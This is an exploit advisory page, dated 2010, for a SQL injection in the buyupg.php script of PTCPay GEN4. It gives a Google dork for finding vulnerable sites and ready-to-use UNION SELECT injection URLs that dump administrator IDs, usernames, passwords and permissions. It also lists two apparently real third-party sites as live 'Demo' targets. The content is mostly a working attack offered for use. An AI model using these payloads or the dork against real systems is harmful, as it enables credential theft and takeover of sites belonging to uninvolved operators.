PTCPay GEN4 remote SQL injection

2010.06.30

Credit: Dark.Man

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

=====================================================
PTCPay GEN4 (buyupg.php) SQL Injection Vulnerability
=====================================================
# Exploit Title:
# Date: 28.06.2010
# Author: Dark.Man > dark.kopat@gmail.com
# Thanks To: Diq3N , SkyTurk , ByHuCRe , HeuRiSTiC , th3spy , 3KStyL3 , WatchFul
# Homepage: http://www.Root-Secure.Org/
# Software Link: http://www.ptcpay.com/
# Version: PTCPay GEN4
# Price: $149.99
# Google dork : "Powered by GeN4"
# Category: SQL Injection
---- Exploit ----
Step 1 - Register The Site
Step 2 - Go to link :
http://www.site.com/buyupg.php?upg=2/**/aNd/**/1=0/**/unIon
SeleCT/**/1,2,3,4,5,6,7,CONCAT_WS(CHAR(32,58,32),aId,aUsername,aPassword,aPermissions),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/admins
{Demo} : https://www.clixid.com/buyupg.php?upg=-2%20unIon%20SeleCT/**/1,2,3,4,5,6,7,CONCAT_WS%28CHAR%2832,58,32%29,aId,aUsername,aPassword,aPermissions%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%20from%20admins
{Demo 2} : http://www.maydebux.com/buyupg.php?upg=-2/**/uNION/**/SeleCT/**/1,2,3,4,5,6,7,group_concat%28aId,0x3a,aUsername,0x3a,aPassword,0x3a,aPermissions%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%20from%20admins

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

PTCPay GEN4 remote SQL injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.